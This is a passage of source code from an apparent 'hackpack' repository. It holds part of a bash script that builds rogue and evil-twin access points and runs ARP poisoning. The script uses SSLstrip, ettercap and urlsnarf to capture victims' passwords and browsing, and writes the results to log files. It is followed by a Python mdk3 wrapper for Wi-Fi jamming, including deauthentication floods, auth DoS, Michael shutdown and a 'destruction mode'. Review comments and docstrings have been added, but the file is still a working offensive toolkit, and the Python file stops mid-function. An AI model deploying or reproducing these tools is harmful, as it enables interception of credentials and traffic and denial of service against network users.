200 | route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
201 | iptables --flush
202 | iptables --table nat --flush
203 | iptables --delete-chain
204 | iptables --table nat --delete-chain
205 | echo 1 > /proc/sys/net/ipv4/ip_forward
206 | iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
207 | iptables -P FORWARD ACCEPT
208 | iptables --append FORWARD --in-interface at0 -j ACCEPT
209 | iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
210 | iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
211 | echo ""
212 |
213 | # DHCP
214 | echo $BLUE" Setting up DHCP to work with $ESSID...."
215 | touch /var/run/dhcpd.pid
216 | chown dhcpd:dhcpd /var/run/dhcpd.pid
217 | xterm -bg blue -fg white -geometry 80x7-0+25 -T DHCP -e dhcpd3 -d -f -cf "/var/run/dhcpd/dhcpd.conf" at0 & dhcpid=$!
218 | sleep 3
219 | echo ""
220 |
221 | # SSLstrip
222 | echo $BLUE" Starting SSLstrip to enumerate user credentials...."
223 | sudo xterm -bg blue -fg white -geometry 80x7-0+193 -T sslstrip -e sslstrip -f -p -k 10000 & sslstripid=$!
224 | sleep 2
225 | echo ""
226 |
227 | # Ettercap
228 | echo $BLUE" Starting Ettercap to sniff client passwords...."
229 | xterm -bg blue -fg white -geometry 80x7-0+366 -T ettercap -s -sb -si +sk -sl 5000 -l -lf /root/$SESSION/ettercap$(date +%F-%H-%M).txt -e ettercap -p -u -T -q -i at0 & ettercapid=$!
230 | sleep 3
231 | echo ""
232 |
233 | # URLSnarf
234 | echo $BLUE" Starting URLSnarf to show the websites the victim browses...."
235 | xterm -bg blue -fg white -geometry 80x7-0+539 -l -lf /root/$SESSION/urlsnarf-$(date +%F-%H%M).txt -e urlsnarf -i $internet_interface & urlsnarfid=$!
236 | sleep 3
237 | clear
238 |
239 |
240 | # SSLstrip.log cat the file sslstrip.log
241 | xterm -bg blue -fg white -geometry 80x7-0-25 -T SSLStrip-Log -l -lf /root/$SESSION/sslstrip$(date +%F-%H-%M).txt -e tail -f sslstrip.log & sslstriplogid=$!
242 |
243 | clear
244 | echo
245 | echo $RED" ####################################################################"
246 | echo $RED" [ em3rgency's Fake AP SSL MITM attack is now running... ]"
247 | echo $RED" [ ]"
248 | echo $RED" [ Press Y then ENTERKEY to close kill and clean up the script ]"
249 | echo $RED" [ ]"
250 | echo $RED" [ IF not closed properly ERRORS WILL OCCUR ]"
251 | echo $RED" ####################################################################"
252 | echo ""
253 | echo ""
254 | read WISH
255 |
256 | # Kill all
257 | if [ $WISH = "y" ] ; then
258 | echo
259 | echo $BLUE" Cleaning up your mess"$STAND
260 | echo ''
261 | sleep 2
262 |
263 | kill ${fakeapid}
264 | kill ${dhcpid}
265 | kill ${sslstripid}
266 | kill ${ettercapid}
267 | kill ${urlsnarfid}
268 | kill ${dritnetid}
269 | kill ${sslstriplogid}
270 |
271 | airmon-ng stop $fakeap_interface
272 | airmon-ng stop $fakeap
273 | echo "0" > /proc/sys/net/ipv4/ip_forward
274 | iptables --flush
275 | iptables --table nat --flush
276 | iptables --delete-chain
277 | iptables --table nat --delete-chain
278 | clear
279 | echo ""
280 | echo ""
281 | echo $RED" [+][+][+] Everything is now cleaned up [+][+][+]"
282 | echo $RED" [+][+][+]Please visit http://www.em3rgency.com[+][+][+]"
283 | echo $RED" [+][+][+] Coded by em3rgency [+][+][+]"
284 | sleep 5
285 | exit
286 |
287 | fi
288 |
289 | sleep 3
290 | clear
291 |
292 | ./911_AP.sh
293 | else
294 |
295 | # This command will RUN The EVIL TWIN AP attack
296 | if [ $menuoption = "3" ]; then
297 | sleep 3
298 |
299 | # Configuring your Network interfaces
300 | echo
301 | echo $BLUE" [+] Lets get started shall we [+]"$STAND
302 | echo ""
303 | echo ""
304 | route -n -A inet | grep UG
305 | echo ""
306 | echo ""
307 | echo ""
308 | echo "Enter the gateway IP address, Shown above. Example 192.168.1.1: "
309 | read -e gatewayip
310 | clear
311 | echo -n "Enter your interface that is connected to the internet, Example eth0: "
312 | read -e internet_interface
313 | clear
314 | echo -n "Enter your interface to be used for the fake AP, Example wlan1: "
315 | read -e fakeap_interface
316 | clear
317 | echo -n "Enter the ESSID you would like your rogue AP to be called: "
318 | read -e ESSID
319 | clear
320 | echo -n "Name the folder you want to save your logs into "
321 | read -e SESSION
322 | clear
323 | mkdir -p /root/$SESSION
324 | clear
325 |
326 | echo $BLUE" Starting Airmon-ng and creating mon0 interface...."$STAND
327 | airmon-ng start $fakeap_interface
328 | fakeap=$fakeap_interface
329 | fakeap_interface="mon0"
330 | sleep 2
331 | clear
332 |
333 | echo $RED" [##########################################################]"
334 | echo $RED" [+][+][+] Running MITM attack vectors [+][+][+]"
335 | echo $RED" [##########################################################]"
336 | sleep 5
337 | echo ""
338 |
339 | # Dhcpd directory and dhcpd.conf creation
340 | mkdir -p "/var/run/dhcpd"
341 | echo "authoritative;
342 |
343 | default-lease-time 700;
344 | max-lease-time 8000;
345 |
346 | subnet 10.0.0.0 netmask 255.255.255.0 {
347 | option routers 10.0.0.1;
348 | option subnet-mask 255.255.255.0;
349 |
350 | option domain-name "\"$ESSID\"";
351 | option domain-name-servers 10.0.0.1;
352 |
353 | range 10.0.0.30 10.0.0.60;
354 |
355 | }" > /var/run/dhcpd/dhcpd.conf
356 |
357 | # FAKEAP setup
358 | echo $BLUE" Configuring and Starting $ESSID...."
359 | xterm -bg blue -fg white -geometry 100x7+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -P -C 60 -e "$ESSID" $fakeap_interface & fakeapid=$!
360 | sleep 3
361 | echo ""
362 |
363 | # Setup your IP Tables
364 | echo " Configuring your IP tables...."
365 | ifconfig lo up
366 | ifconfig at0 up &
367 | sleep 1
368 | ifconfig at0 10.0.0.1 netmask 255.255.255.0
369 | ifconfig at0 mtu 1400
370 | route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
371 | iptables --flush
372 | iptables --table nat --flush
373 | iptables --delete-chain
374 | iptables --table nat --delete-chain
375 | echo 1 > /proc/sys/net/ipv4/ip_forward
376 | iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
377 | iptables -P FORWARD ACCEPT
378 | iptables --append FORWARD --in-interface at0 -j ACCEPT
379 | iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
380 | iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
381 | echo ""
382 |
383 | # DHCP
384 | echo " Setting up DHCP to work with EVIL TWIN AP...."
385 | touch /var/run/dhcpd.pid
386 | chown dhcpd:dhcpd /var/run/dhcpd.pid
387 | xterm -bg blue -fg white -geometry 80x7-0+25 -T DHCP -e dhcpd3 -d -f -cf "/var/run/dhcpd/dhcpd.conf" at0 & dhcpid=$!
388 | sleep 3
389 | echo ""
390 |
391 | # SSLstrip
392 | echo " Starting SSLstrip to enumerate user credentials...."
393 | sudo xterm -bg blue -fg white -geometry 80x7-0+193 -T sslstrip -e sslstrip -f -p -k 10000 & sslstripid=$!
394 | sleep 2
395 | echo ""
396 |
397 | # Ettercap
398 | echo " Starting Ettercap to sniff client passwords...."
399 | xterm -bg blue -fg white -geometry 80x7-0+366 -T ettercap -s -sb -si +sk -sl 5000 -l -lf /root/$SESSION/ettercap$(date +%F-%H-%M).txt -e ettercap -p -u -T -q -i at0 & ettercapid=$!
400 | sleep 3
401 | echo ""
402 |
403 | # URLSnarf
404 | echo " Starting URLSnarf to show the websites the victim browses...."
405 | xterm -bg blue -fg white -geometry 80x7-0+539 -l -lf /root/$SESSION/urlsnarf-$(date +%F-%H%M).txt -e urlsnarf -i $internet_interface & urlsnarfid=$!
406 | sleep 3
407 | clear
408 |
409 | #SSLstrip.log cat the file sslstrip.log
410 | xterm -bg blue -fg white -geometry 80x7-0-25 -T SSLStrip-Log -l -lf /root/$SESSION/sslstrip$(date +%F-%H-%M).txt -e tail -f sslstrip.log & sslstriplogid=$!
411 |
412 | clear
413 | echo
414 | echo $RED" ####################################################################"
415 | echo $RED" [ em3rgency's Fake AP SSL MITM attack is now running... ]"
416 | echo $RED" [ ]"
417 | echo $RED" [ Press Y then ENTERKEY to close kill and clean up the script ]"
418 | echo $RED" [ ]"
419 | echo $RED" [ IF not closed properly ERRORS WILL OCCUR ]"
420 | echo $RED" ####################################################################"
421 | echo $STAND""
422 | echo ""
423 | read WISH
424 |
425 | # Kill all
426 | if [ $WISH = "y" ] ; then
427 | echo
428 | echo $BLUE" Cleaning up your mess"
429 | echo ''
430 | sleep 2
431 |
432 | kill ${fakeapid}
433 | kill ${dhcpid}
434 | kill ${sslstripid}
435 | kill ${ettercapid}
436 | kill ${urlsnarfid}
437 | kill ${dritnetid}
438 | kill ${sslstriplogid}
439 |
440 | airmon-ng stop $fakeap_interface
441 | airmon-ng stop $fakeap
442 | echo "0" > /proc/sys/net/ipv4/ip_forward
443 | iptables --flush
444 | iptables --table nat --flush
445 | iptables --delete-chain
446 | iptables --table nat --delete-chain
447 | clear
448 | echo ""
449 | echo ""
450 | echo $RED" [+][+][+] Everything is now cleaned up [+][+][+]"
451 | echo $RED" [+][+][+]Please visit http://www.em3rgency.com[+][+][+]"
452 | echo $RED" [+][+][+] Coded by em3rgency [+][+][+]"$STAND
453 | sleep 5
454 |
455 | fi
456 |
457 | sleep 3
458 | clear
459 | ./911_AP.sh
460 | else
461 |
462 | # Credits to N1t0g3n for the base to this section. Thanks bro
463 | if [ $menuoption = "4" ]; then
464 | clear
465 | echo ""
466 | echo ""
467 | echo $BLUE" Finding wireless and ethernet interfaces."$STAND
468 | sleep 3
469 | echo ""
470 | ifconfig -a | cut -d " " -f1 | sed '/^$/d' | egrep -v 'lo|vm'
471 | echo ""
472 | echo ""
473 | echo "Please type the name of your wireless interface (wlan0): "
474 | read WIFACE
475 | sleep 2
476 | echo ""
477 | echo ""
478 | echo "Please type the name of your ethernet interface (eth0): "
479 | read ETH0
480 | clear
481 | echo -n "Name the folder you want to save your logs into "
482 | read -e SESSION
483 |
484 | mkdir -p /root/$SESSION
485 | clear
486 | echo ""
487 | echo ""
488 | clear
489 | echo $RED" **************************************************";
490 | echo $RED" * 1. Attack entire Gateway through LAN *";
491 | echo $RED" * 2. Attack entire Gateway through Wireless *";
492 | echo $RED" * 3. Attack single host through LAN *";
493 | echo $RED" * 4. Attack single host through Wireless *";
494 | echo $RED" * 5. Return to Main Menu *";
495 | echo $RED" **************************************************";
496 | echo $STAND""
497 | echo ""
498 | echo $BLUE" Select Menu Option: "
499 | read menuoption
500 | if [ $menuoption = "1" ]; then
501 | echo
502 | echo
503 | echo " This should be your Gateway from what I see: "
504 | echo ""
505 | echo ""
506 | route -n -A inet | grep UG
507 | echo ""
508 | echo ""
509 | echo $STAND"Please type the IP of your Gateway in below: "$STAND
510 | read GATEWAY
511 | echo $BLUE" Starting attack on Gateway"
512 | echo ""
513 | echo ""
514 | echo " Passwords will show up in ettercap window"
515 | sleep 3
516 | echo "1" > /proc/sys/net/ipv4/ip_forward
517 |
518 | # PORT redirection
519 | iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
520 | sleep 2
521 |
522 | # URLSnarf
523 | sudo xterm -bg blue -fg white -geometry 80x7-0+25 -l -lf /root/$SESSION/urlsnarf-$(date +%F-%H%M).txt -e urlsnarf -i $ETH0 &
524 | sleep 2
525 |
526 | # Ettercap
527 | xterm -bg blue -fg white -geometry 80x7-0+366 -s -sb -si +sk -sl 5000 -l -lf /root/$SESSION/ettercap$(date +%F-%H-%M).txt -e ettercap -Tq -i $ETH0 -M arp:remote /$GATEWAY/ // &
528 | sleep 2
529 |
530 | # SSLstrip
531 | sudo xterm -bg blue -fg white -geometry 80x7-0+193 -e sslstrip -f -p -k 10000 &
532 | sleep 2
533 |
534 | # SSLstrip.log cat the file sslstrip.log
535 | xterm -bg blue -fg white -geometry 80x7-0+539 -T SSLStrip-Log -l -lf /root/$SESSION/sslstrip$(date +%F-%H-%M).txt -e tail -f sslstrip.log &
536 | sleep 2
537 |
538 |
539 |
540 | clear
541 | echo $RED" ####################################################################"
542 | echo $RED" [ em3rgency's ARP poisoning script is now running ]"
543 | echo $RED" [ ]"
544 | echo $RED" [ Press ENTER return to the Main Menu ]"
545 | echo $RED" [ ]"
546 | echo $RED" [ IF not closed properly ERRORS WILL OCCUR ]"
547 | echo $RED" ####################################################################"$STAND
548 | read ENTERKEY
549 |
550 | killall sslstrip
551 | killall ettercap
552 | killall urlsnarf
553 | killall xterm
554 | echo "0" > /proc/sys/net/ipv4/ip_forward
555 | iptables --flush
556 | iptables --table nat --flush
557 | iptables --delete-chain
558 | iptables --table nat --delete-chain
559 |
560 | ./911_AP.sh
561 | else
562 | if [ $menuoption = "2" ]; then
563 | #This will allow you to forward packets from the router
564 | echo $BLUE" This should be your gateway from what I see: "$STAND
565 | echo ""
566 | echo ""
567 | route -n -A inet | grep UG
568 | echo ""
569 | echo ""
570 | echo $BLUE"Please type the IP of your gateway: "$STAND
571 | read GATEWAY
572 | echo $BLUE" Starting attack on gateway"
573 | echo ""
574 | echo ""
575 | echo ""
576 | echo " Passwords will show up in ettercap window"
577 | sleep 3
578 |
579 |
580 | echo "1" > /proc/sys/net/ipv4/ip_forward
581 |
582 |
583 | # URLSnarf
584 | sudo xterm -bg blue -fg white -geometry 80x7-0+25 -l -lf /root/$SESSION/urlsnarf-$(date +%F-%H%M).txt -e urlsnarf -i $WIFACE &
585 | sleep 2
586 |
587 | # Port redirection
588 | iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
589 | sleep 2
590 |
591 | # Etterap
592 | sudo xterm -bg blue -fg white -geometry 80x7-0+193 -l -lf /root/$SESSION/ettercap$(date +%F-%H-%M).txt -e ettercap -Tq -i $WIFACE -M arp:remote /$GATEWAY/ // &
593 | sleep 2
594 |
595 | # SSLstrip
596 | sudo xterm -bg blue -fg white -geometry 80x7-0+366 -e sslstrip -f -p -k 10000 &
597 | sleep 2
598 |
599 | # SSLstrip.log cat the file sslstrip.log
600 | xterm -bg blue -fg white -geometry 80x7-0+539 -T SSLStrip-Log -l -lf /root/$SESSION/sslstrip$(date +%F-%H-%M).txt -e tail -f sslstrip.log &
601 | sleep 2
602 |
603 | clear
604 | echo $RED" ####################################################################"
605 | echo $RED" [ em3rgency's ARP poisoning script is now running ]"
606 | echo $RED" [ ]"
607 | echo $RED" [ Press ENTER return to the Main Menu ]"
608 | echo $RED" [ ]"
609 | echo $RED" [ IF not closed properly ERRORS WILL OCCUR ]"
610 | echo $RED" ####################################################################"$STAND
611 | read ENTERKEY
612 |
613 | killall sslstrip
614 | killall ettercap
615 | killall urlsnarf
616 | killall xterm
617 | echo "0" > /proc/sys/net/ipv4/ip_forward
618 | iptables --flush
619 | iptables --table nat --flush
620 | iptables --delete-chain
621 | iptables --table nat --delete-chain
622 |
623 | ./911_AP.sh
624 | else
625 | if [ $menuoption = "3" ]; then
626 | #This will allow you to forward packets from the router
627 | echo ""
628 | echo ""
629 | echo $BLUE" This should be your gateway from what I see: "
630 | echo ""
631 | echo ""
632 | route -n -A inet | grep UG
633 | echo ""
634 | echo ""
635 | echo $STAND"Please type the IP of your gateway: "
636 | read GATEWAY3
637 | echo ""
638 | echo ""
639 | echo "Please type the IP of the target host: "
640 | read HOST3
641 | echo ""
642 | echo $BLUE" Starting Attack on Target Host"
643 | echo ""
644 | echo ""
645 | echo " Passwords will show up in ettercap window"
646 | sleep 3
647 |
648 | echo "1" > /proc/sys/net/ipv4/ip_forward
649 |
650 | # URLsnarf
651 | sudo xterm -bg blue -fg white -geometry 80x7-0+25 -l -lf /root/$SESSION/urlsnarf-$(date +%F-%H%M).txt -e urlsnarf -i $ETH0 &
652 | sleep 2
653 |
654 | # Port redirection
655 | iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
656 | sleep 2
657 |
658 | # Ettercap
659 | sudo xterm -bg blue -fg white -geometry 80x7-0+193 -l -lf /root/$SESSION/ettercap$(date +%F-%H-%M).txt -e ettercap -TqM ARP:REMOTE /$GATEWAY3/ /$HOST3/ &
660 | sleep 2
661 |
662 | # SSLstrip
663 | sudo xterm -bg blue -fg white -geometry 80x7-0+366 -e sslstrip -f -p -k 10000 &
664 | sleep 2
665 |
666 | # SSLstrip.log cat the file sslstrip.log
667 | xterm -bg blue -fg white -geometry 80x7-0+539 -T SSLStrip-Log -l -lf /root/$SESSION/sslstrip$(date +%F-%H-%M).txt -e tail -f sslstrip.log &
668 | sleep 2
669 |
670 | clear
671 | echo $RED" ####################################################################"
672 | echo $RED" [ em3rgency's ARP poisoning script is now running ]"
673 | echo $RED" [ ]"
674 | echo $RED" [ Press ENTER return to the Main Menu ]"
675 | echo $RED" [ ]"
676 | echo $RED" [ IF not closed properly ERRORS WILL OCCUR ]"
677 | echo $RED" ####################################################################"
678 | read ENTERKEY
679 |
680 | killall sslstrip
681 | killall ettercap
682 | killall urlsnarf
683 | killall xterm
684 | echo "0" > /proc/sys/net/ipv4/ip_forward
685 | iptables --flush
686 | iptables --table nat --flush
687 | iptables --delete-chain
688 | iptables --table nat --delete-chain
689 |
690 | ./911_AP.sh
691 | else
692 | if [ $menuoption = "4" ]; then
693 | echo ""
694 | echo ""
695 | echo $BLUE"This should be your Gateway from what I see: "
696 | echo ""
697 | route -n -A inet | grep UG
698 | echo ""
699 | echo ""
700 | echo $STAND"Please type the IP of your gateway: "
701 | read GATEWAY4
702 | echo ""
703 | echo "Please type the IP of the target host: "
704 | read HOST4
705 | echo ""
706 | echo $BLUE" Starting Attack on Target Host"
707 | echo ""
708 | echo ""
709 | echo " Passwords will show up in ettercap window"
710 | sleep 3
711 |
712 | echo "1" > /proc/sys/net/ipv4/ip_forward
713 |
714 |
715 | # URLsnarf
716 | sudo xterm -bg blue -fg white -geometry 80x7-0+25 -l -lf /root/$SESSION/urlsnarf-$(date +%F-%H%M).txt -e urlsnarf -i $WIFACE &
717 | sleep 2
718 |
719 | # Port redirection
720 | iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
721 | sleep 2
722 |
723 | # Ettercap
724 | sudo xterm -bg blue -fg white -geometry 80x7-0+193 -l -lf /root/$SESSION/ettercap$(date +%F-%H-%M).txt -e ettercap -Tq -i $WIFACE -M arp:remote /$GATEWAY4/ /$HOST4/ &
725 | sleep 2
726 |
727 | # SSLstrip
728 | sudo xterm -bg blue -fg white -geometry 80x7-0+366 -e sslstrip -f -p -k 10000 &
729 | sleep 2
730 |
731 | # SSLstrip.log cat the file sslstrip.log
732 | xterm -bg blue -fg white -geometry 80x7-0+539 -T SSLStrip-Log -l -lf /root/$SESSION/sslstrip$(date +%F-%H-%M).txt -e tail -f sslstrip.log &
733 | sleep 2
734 |
735 | clear
736 | echo $RED" ####################################################################"
737 | echo $RED" [ em3rgency's ARP poisoning script is now running ]"
738 | echo $RED" [ ]"
739 | echo $RED" [ Press ENTER return to the Main Menu ]"
740 | echo $RED" [ ]"
741 | echo $RED" [ IF not closed properly ERRORS WILL OCCUR ]"
742 | echo $RED" ####################################################################"
743 | read ENTERKEY
744 |
745 | killall sslstrip
746 | killall ettercap
747 | killall urlsnarf
748 | killall xterm
749 | echo "0" > /proc/sys/net/ipv4/ip_forward
750 | iptables --flush
751 | iptables --table nat --flush
752 | iptables --delete-chain
753 | iptables --table nat --delete-chain
754 |
755 | ./911_AP.sh
756 | clear
757 |
758 | echo $RED" Invalid option, you must choose 1,2,3,4 or 5.."
759 | sleep 2
760 | echo $BLUE" Re-Launching Script..."
761 | ./911_AP.sh
762 |
763 | fi
764 | fi
765 | fi
766 | fi
767 | if [ $menuoption = "5" ]; then
768 | ./911_AP.sh
769 | fi
770 | else
771 |
772 | # A script to quickly tell whose on your network in real time.
773 | if [ $menuoption = "5" ]; then
774 | clear
775 | echo $BLUE" This will show all The clients connected to The network"
776 | echo ""
777 | sleep 3
778 | clear
779 | echo
780 | echo
781 | echo $STAND"Please type the name of your network interface Example: eth0 "
782 | read IFACE;
783 | echo ""
784 | echo ""
785 | echo " This should be your gateway from what I see: "
786 | route -n -A inet | grep UG
787 | sleep 1
788 | echo ""
789 | echo ""
790 | echo $STAND"Please type in the IP address of your gateway"
791 | read GATEWAY;
792 | sleep 2
793 | clear
794 | echo ""
795 | echo ""
796 | echo ""
797 | echo $BLUE" Press CTRL C to stop close netdiscover"
798 | echo ""
799 | echo ""
800 | echo $RED" ####################################################################"
801 | echo $RED" [ em3rgency's Netdiscover script is now running ]"
802 | echo $RED" [ ]"
803 | echo $RED" [ Press ENTER return to the Main Menu ]"
804 | echo $RED" [ ]"
805 | echo $RED" [ IF not closed properly ERRORS WILL OCCUR ]"
806 | echo $RED" ####################################################################"
807 |
808 | sudo xterm -bg blue -fg white -e netdiscover -i $IFACE -r $GATEWAY/24
809 | read ENTERKEY
810 | clear
811 | ./911_AP.sh
812 |
813 | else
814 | if [ $menuoption = "6" ]; then
815 | exit
816 | fi
817 | fi
818 | fi
819 | fi
820 | fi
821 | fi
822 |
--------------------------------------------------------------------------------
/hackpack/hackpack/AP_fucker.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: Utf-8 -*-
3 | #
4 | # WIRELESS ACCESS POINT ****ER
5 | # Interactive, Multifunction, Destruction Mode Included
6 | # Name: AP-****er.py
7 | # Version: 0.4
8 | # Coded by: MatToufoutu
9 | #
10 | # Thanks to BackTrack crew, especially ShamanVirtuel for his help and ASPJ for creating mdk3
11 | #
12 | # USAGE: Launch the script as root using "python AP-****er.py", follow instructions, enjoy!
13 | # Prerequisites: Have mdk3 installed
14 | #
15 |
16 | ### IMPORTS
17 | import commands, os
18 | from sys import stdout, exit
19 | from threading import Thread
20 | from time import sleep, ctime
21 | try:
22 | import psyco
23 | psyco.profile()
24 | except ImportError:
25 | pass
26 |
27 | ### MDK3 THREADED ATTACKS CLASS
class mdk3(Thread):
    """Thread wrapper that shells out to the external ``mdk3`` binary for one mode.

    ``attack`` is a one-letter mode code ("B", "A", "D", "M" or "W") and
    ``attack_options`` is read positionally as [iface, essid, bssid, chan].
    Each mode appends a timestamped marker to ``self.log``, echoes the same
    text to the terminal, waits two seconds, then runs ``mdk3`` with its
    output appended to the same log file.

    NOTE(review): every option is concatenated into an ``os.system`` command
    line without escaping, so whatever the caller stored in ``essid`` /
    ``iface`` is interpreted by the shell. Nothing in this class validates them.

    Defender context: protected management frames (802.11w) address spoofed
    deauthentication, and the Michael countermeasure shutdown only applies to
    networks that still use TKIP.
    """

    def __init__(self, attack, attack_options):
        Thread.__init__(self)
        self.attack = attack
        # Positional layout of attack_options: interface, ESSID, BSSID, channel.
        self.iface = attack_options[0]
        self.essid = attack_options[1]
        self.bssid = attack_options[2]
        self.chan = attack_options[3]
        self.log = "ap****er.log"

    def _announce(self, text, tail=""):
        # Write the timestamped marker to the log, mirror it on the console
        # (with an optional trailing suffix), then pause before the command runs.
        handle = open(self.log, "a")
        handle.write("\n ----- " + ctime() + " : " + text + " -----")
        handle.close()
        print("\n " + text + tail)
        sleep(2)

    def _run(self, mode_args):
        # Single place where the shell command line is assembled and executed.
        os.system("mdk3 " + self.iface + " " + mode_args + " >> " + self.log)

    def bflood(self):
        self._announce("Launching beacon flood against %s on channel %s" % (self.essid, self.chan))
        self._run("b -n " + self.essid + " -g -w -m -c " + self.chan)

    def ados(self):
        # The console line for this mode carries one trailing space; the log line does not.
        self._announce("Launching Auth DoS against %s" % (self.bssid), " ")
        self._run("a -i " + self.bssid + " -m -s 1024")

    def amok(self):
        self._announce("Launching Deauth Flood 'Amok' Mode on channel %s" % (self.chan))
        self._run("d -c " + self.chan + " -s 1024")

    def mich(self):
        self._announce("Launching Michael 'Shutdown' Exploitation against %s on channel %s" % (self.bssid, self.chan))
        self._run("m -t " + self.bssid + " -j -w 1 -n 1024 -s 1024")

    def wids(self):
        self._announce("Launching WIDS Confusion against %s on channel %s" % (self.essid, self.chan))
        self._run("w -e " + self.essid + " -c " + self.chan)

    def run(self):
        # Map the mode letter to its method; an unknown letter does nothing.
        handlers = {
            "B": self.bflood,
            "A": self.ados,
            "D": self.amok,
            "M": self.mich,
            "W": self.wids,
        }
        handler = handlers.get(self.attack)
        if handler is not None:
            handler()
83 |
84 | ### AUXILIARY FUNCTIONS
85 | ## CHECK IF IFACE IS IN MONITOR MODE
def check_mon(iface):
    """Return True when ``iwconfig <iface>`` reports ``Mode:Monitor``, else False."""
    # NOTE(review): iface is typed by the operator and concatenated into a
    # shell command unescaped; this runs as root (see the whoami check below).
    report = commands.getoutput("iwconfig "+iface)
    return any("Mode:Monitor" in row for row in report.splitlines())
91 |
92 | ## CHECK IF BSSID IS VALID
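def check_mac(ap):
    """Return True only for a colon-separated MAC such as ``00:11:22:33:44:55``.

    The previous check compared only the total length, the number of colons
    and the character set, so strings like ``0123456789ab:::::`` passed.
    Here the value must split into exactly six groups of two hex digits.
    Because the accepted value is later concatenated into a shell command by
    the mdk3 class, a strict format also keeps shell metacharacters out.

    ap -- candidate BSSID string (upper or lower case hex accepted).
    """
    hexdigits = "0123456789abcdef"
    octets = ap.split(":")
    if len(octets) != 6:
        return False
    for octet in octets:
        # Each group must be exactly two characters, both hex digits.
        if len(octet) != 2:
            return False
        for ch in octet.lower():
            if ch not in hexdigits:
                return False
    return True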
101 |
102 | ## CHECK IF CHANNEL IS VALID
def check_chan(iface, chan):
    """Return True when ``chan`` is a decimal number between 1 and the channel
    count that ``iwlist <iface> channel`` reports, otherwise False.

    Non-numeric input is rejected before any external command is run.
    """
    if not chan.isdigit():
        return False
    # NOTE(review): iface is concatenated into a shell pipeline unescaped, and
    # int() raises ValueError if the pipeline prints anything but a number.
    highest = int(commands.getoutput("iwlist "+iface+" channel | grep channels | awk '{print $2}'"))
    return int(chan) in range(1, highest+1)
111 |
112 | ## CLEAN EXIT
def clean_exit():
    """Print the abort message, SIGKILL every process whose ``ps aux`` line
    mentions mdk3, clear the terminal and exit with status 0."""
    print
    print
    print("\nAction aborted by user. Exiting now")
    # The match is on the whole ps line, so any process with "mdk3" in its
    # command line is killed, not only the ones this script started.
    pid_listing = commands.getoutput("ps aux | grep mdk3 | grep -v grep | awk '{print $2}'")
    for mdk3_pid in pid_listing.splitlines():
        os.system("kill -9 "+mdk3_pid)
    print("Hope you enjoyed it ;-)")
    sleep(3)
    os.system("clear")
    exit(0)
122 |
123 | ## DUMMY WAITING MESSAGE (ANIMATED)
def waiter(mess):
    """Draw two turns of a four-frame text spinner in front of ``mess``.

    Each frame is written with a leading carriage return, flushed, and held
    for 0.15 s. Ctrl+C during the animation hands over to clean_exit().
    """
    spinner = ("\r | ", "\r / ", "\r-- ", "\r \\ ")
    try:
        for _turn in range(2):
            for frame in spinner:
                stdout.write(frame+mess)
                stdout.flush()
                sleep(0.15)
    except KeyboardInterrupt:
        clean_exit()
152 |
153 | ### MAIN APP
# Interactive driver: asks for a mode letter, a monitor-mode interface and the
# target parameters that mode needs, then starts one mdk3 thread (or four of
# them for mode "T") and spins in waiter() until Ctrl+C triggers clean_exit().
attackAvail = ["B", "A", "W", "D", "M", "T"]
# Filled positionally as [iface, essid, bssid, chan]; the mdk3 class reads the
# same indices, so unused slots are padded with None to keep positions stable.
attack_opt=[]

# Root check is done by running `whoami`; note the refusal path exits with
# status 0, so a caller cannot tell it apart from a normal run.
if commands.getoutput("whoami") != "root":
    print("This script must be run as root !")
    exit(0)
try:
    os.system("clear")
    print("\n\t\t########## ACCESS POINT F.U.C.K.E.R ##########\n")
    print("Choose your Mode:\n\t - (B)eacon flood\n\t - (A)uth DoS\n\t - (W)ids confusion\n\t - (D)isassociation 'AmoK Mode'\n\t - (M)ichael shutdown exploitation\n\t - Des(T)ruction mode (USE WITH CAUTION)\n")

    ## GET MODE
    # Loop until the upper-cased answer is one of the letters in attackAvail.
    while 1:
        mode = raw_input("\n>>> ")
        if mode.upper() not in attackAvail:
            print(" '%s' is not a valid mode !" % mode)
        else:
            break

    ## GET INTERFACE
    # check_mon() is the only validation applied to the interface name.
    while 1:
        iface = raw_input("\nMonitor interface to use: ")
        if check_mon(iface):
            attack_opt.append(iface)
            break
        else:
            print("%s is not a Monitor interface, try again or hit Ctrl+C to quit" % iface)

    ## GET ESSID
    # NOTE(review): the ESSID is wrapped in literal double quotes but not
    # escaped; the mdk3 class later concatenates it into an os.system() string,
    # so quotes or $(...) inside the answer reach the shell.
    if mode.upper() == "B" or mode.upper() == "W" or mode.upper() == "T":
        attack_opt.append("\""+raw_input("\nTarget ESSID: ")+"\"")
    else:
        attack_opt.append(None)

    ## GET BSSID
    if mode.upper() == "A" or mode.upper() == "M" or mode.upper() == "T":
        while 1:
            bssid = raw_input("\nTarget BSSID: ")
            if check_mac(bssid):
                attack_opt.append(bssid)
                break
            else:
                print("Invalid BSSID, try again or hit Ctrl+C to quit")
    else:
        attack_opt.append(None)

    ## GET CHANNEL
    # The message below says 1 to 14, but check_chan() takes its upper bound
    # from the iwlist output for this interface.
    if mode.upper() == "B" or mode.upper() == "D" or mode.upper() == "W" or mode.upper() == "T":
        while 1:
            channel = raw_input("\nTarget channel: ")
            if check_chan(iface, channel):
                attack_opt.append(channel)
                break
            else:
                print("Channel can only be 1 to 14, try again or hit Ctrl+C to quit")
    else:
        attack_opt.append(None)

    ## LAUNCH SELECTED ATTACK
    # Any log left by a previous run in the current directory is deleted first.
    if os.path.exists("ap****er.log"):
        os.unlink("ap****er.log")
    if mode.upper() != "T":
        os.system('clear')
        mdk3(mode.upper(), attack_opt).start()
        sleep(1)
        print; print; print
